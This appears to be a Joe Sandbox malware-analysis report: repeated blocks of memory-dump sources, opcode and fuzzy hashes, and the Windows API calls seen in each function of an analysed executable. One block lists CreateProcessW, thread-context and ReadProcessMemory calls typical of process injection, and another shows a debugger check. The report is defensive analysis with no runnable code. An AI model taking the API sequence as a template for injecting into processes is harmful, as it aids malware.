                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast__wsplitpath
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2679896820-0
                                                                                                                                                                                                                                                      • Opcode ID: 59a67ef41ad23059d72b360051cb5f2e6e7c0eae4435b2a433dbde0e582b4218
                                                                                                                                                                                                                                                      • Instruction ID: f1ba4291d5c8b22baefdab76b277e6cb12a8e93210f8b77f597ef8f32dc9b6ef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59a67ef41ad23059d72b360051cb5f2e6e7c0eae4435b2a433dbde0e582b4218
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B15183356043019FC724EF54C991FAEB3E5AF89320F04456DF95A9B3D2CB31A84AEB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • IsThemeActive.UXTHEME ref: 00EC3A73
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1405: __lock.LIBCMT ref: 00EE140B
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00EC3AF3
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EC3B08
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00EC3AA3,?), ref: 00EC3D45
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00EC3AA3,?), ref: 00EC3D57
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F81148,00F81130,?,?,?,?,00EC3AA3,?), ref: 00EC3DC8
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00EC3AA3,?), ref: 00EC3E48
                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EC3AB3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 924797094-0
                                                                                                                                                                                                                                                      • Opcode ID: 2fc240ca7b217e7ccf17e53fb60a62579baf69b7ecd48a87ea56409baac13035
                                                                                                                                                                                                                                                      • Instruction ID: 043ba75ad0ebbba181716cbea487b85dc6d714344a0f597cf3c306aa497fed16
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fc240ca7b217e7ccf17e53fb60a62579baf69b7ecd48a87ea56409baac13035
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F011C0719043489BC310EF25ED05A6AFBE8FF94710F008A1FF985972A1DB709982DB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00EC4582,?,?,?,?,00EC2E1A), ref: 00EC482D
                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00EC4582,?,?,?,?,00EC2E1A), ref: 00F34089
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                                      • Opcode ID: 73933b57e56f4119be556167f338fa907bb7eb050b0a3721d68608e28bffd1c2
                                                                                                                                                                                                                                                      • Instruction ID: 2cba9f8945ba9619a24d54ecc51423babd4dd4585f1fc762af84bd4c8682a50c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73933b57e56f4119be556167f338fa907bb7eb050b0a3721d68608e28bffd1c2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 640184B5244348BEF3240E14CD9AF6536DCEB1177CF108318BAE56A1E0C6B61C45DB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___lock_fhandle.LIBCMT ref: 00EEEA29
                                                                                                                                                                                                                                                      • __close_nolock.LIBCMT ref: 00EEEA42
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7BDA: __getptd_noexit.LIBCMT ref: 00EE7BDA
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1046115767-0
                                                                                                                                                                                                                                                      • Opcode ID: af2ce6d7d1b5c725e6cefc739edd928e2d527ddfd6e9ed26f5a6a362b3e95e28
                                                                                                                                                                                                                                                      • Instruction ID: 399e6f864d71bb3bf3a02b06a67ce1ba249b1360d51192d513e941608243bbe5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af2ce6d7d1b5c725e6cefc739edd928e2d527ddfd6e9ed26f5a6a362b3e95e28
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1911E972805ADC8AD711BF66D8413997AE16F81331F266354E4687F3E3DBB48C00D7A5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EE395C: __FF_MSGBANNER.LIBCMT ref: 00EE3973
                                                                                                                                                                                                                                                        • Part of subcall function 00EE395C: __NMSG_WRITE.LIBCMT ref: 00EE397A
                                                                                                                                                                                                                                                        • Part of subcall function 00EE395C: RtlAllocateHeap.NTDLL(01120000,00000000,00000001,00000001,00000000,?,?,00EDF507,?,0000000E), ref: 00EE399F
                                                                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 00EDF51E
                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00EDF533
                                                                                                                                                                                                                                                        • Part of subcall function 00EE6805: RaiseException.KERNEL32(?,?,0000000E,00F76A30,?,?,?,00EDF538,0000000E,00F76A30,?,00000001), ref: 00EE6856
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3902256705-0
                                                                                                                                                                                                                                                      • Opcode ID: 8d117a8809406be218778590c0b3884b47d558fccc3d4b591cfbc9d5c75236d1
                                                                                                                                                                                                                                                      • Instruction ID: bb3c2f81a27b598413066c2675d1f1c1abb05133daf4a6df1590e9fd94b59a9a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d117a8809406be218778590c0b3884b47d558fccc3d4b591cfbc9d5c75236d1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29F0A43110425E67DB04FF99E8019DE7BE89F00354F605127F909F2382DBB0DA4296A5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __lock_file_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 26237723-0
                                                                                                                                                                                                                                                      • Opcode ID: bd51ced16677a0fdde689e622b62955a9b89d6cfcde8a4bc21625b1974f6b84e
                                                                                                                                                                                                                                                      • Instruction ID: cd377ad8067f894c4725fabe6a4066de067a8d9c03eb9ec3aa9ad00fdfde0a58
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd51ced16677a0fdde689e622b62955a9b89d6cfcde8a4bc21625b1974f6b84e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F01887180068DFBCF25AFB68C0649F7BA1AF80350F145119F414771E1D7718751DB95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 00EE3629
                                                                                                                                                                                                                                                        • Part of subcall function 00EE4E1C: __lock.LIBCMT ref: 00EE4E3F
                                                                                                                                                                                                                                                      • __fclose_nolock.LIBCMT ref: 00EE3634
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2800547568-0
                                                                                                                                                                                                                                                      • Opcode ID: 1a1ce74ae25b9d275eacf23fb48578dc235c33cc059e996c529d1ddb19cc4ee1
                                                                                                                                                                                                                                                      • Instruction ID: 4eec53a5235cfb4c19fe898efc409cad80c2eb163889acde10d5ea671e44f7cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a1ce74ae25b9d275eacf23fb48578dc235c33cc059e996c529d1ddb19cc4ee1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABF02B7180068DAAD711BB77880A76E76E06F50334F259108E414FB2D2C77C87019B52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,00EDE581,00000010,?,00000010,?,00000000), ref: 00ECC1F4
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,00EDE581,00000010,?,00000010,?,00000000), ref: 00ECC224
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 626452242-0
                                                                                                                                                                                                                                                      • Opcode ID: 453a3d67a43dd0b5bb9b790f45d16a6ab94fa2a1706c9b116cc3d4bc59d14baa
                                                                                                                                                                                                                                                      • Instruction ID: e3c7e0093a7526c514e1e63b425a60185b25992dce7e339684a785de1ed505c3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 453a3d67a43dd0b5bb9b790f45d16a6ab94fa2a1706c9b116cc3d4bc59d14baa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC01A271200204BFEB14AB65DC46FBB7B5CEF96760F10802AFD09DE2A1DA62A8418660
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0116D28B
                                                                                                                                                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0116D321
                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0116D343
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654880838.000000000116B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116B000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_116b000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2438371351-0
                                                                                                                                                                                                                                                      • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                                                                                                                                                                                      • Instruction ID: 147cab9e1d926dab4e82e5b74889f970e79abb32456be181d4ca9e2c4d24eb3e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1812DE24E18658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4E91CF5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __flush.LIBCMT ref: 00EE2A0B
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __flush__getptd_noexit
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4101623367-0
                                                                                                                                                                                                                                                      • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                                                                                                                                                      • Instruction ID: ff36d21d3de010af20db12a181e73da51e26694fbb90b659c1626c0c56dabf9c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D141C77060078E9FDB2C8E6BC8805AE77BAAF84354B24A53DE559E7241DB71DD408740
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00EC4774
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                                      • Opcode ID: 8bc769c64e8d56e97d945f9acafd59142287971bb0acf7b86f7f5ee7c1911e5a
                                                                                                                                                                                                                                                      • Instruction ID: 44470101377f557b406333b81774ea36749915a9706315077ab927017946a9bb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bc769c64e8d56e97d945f9acafd59142287971bb0acf7b86f7f5ee7c1911e5a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70316EB1A00605AFCB08CF6CC594B9DB7B5FF49324F14861EE819A7740D772B961CB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                      • Instruction ID: ab5809efef14d9ef25b5f982cbd02ea546140c47e45d623e93ecdc7632d7642e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7731E970A00105DBC718EF68C4889A9FBB6FF49344B6496A6E409EF355DB31EDC2CB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                                                                      • Opcode ID: da258e1292b997d9ea2e49587eced076044caa121b425e0dbdf7a6656d3dd668
                                                                                                                                                                                                                                                      • Instruction ID: 0363b1b80d716ebb6745ced6bb30ede468509f6631df050c6543740e10b4e630
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da258e1292b997d9ea2e49587eced076044caa121b425e0dbdf7a6656d3dd668
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95416D705086418FDB24CF14C484B1ABBE1FF45318F19899DE9965B362C376EC46DF42
                                                                                                                                                                                                                                                      Memory Dump Source
